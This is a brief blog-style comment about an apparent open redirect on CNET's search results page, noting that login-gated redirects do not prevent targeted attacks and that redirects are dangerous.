http://www.cnet.com/1770-5_1-0.html?query=windows+7+sp1&tag=srch
As you can see from the URL, this came from searching for windows 7 sp1 on cnet’s website, and the redirect at the top of the page came from this page.
There seems to be quite a few redirects which require the user to login first but this doesn’t fix the problem, since if it is a targeted attack, they will use a website that the target probably has a login for.
Either way redirects can be very dangerous, and shouldn’t be a problem that gets put off.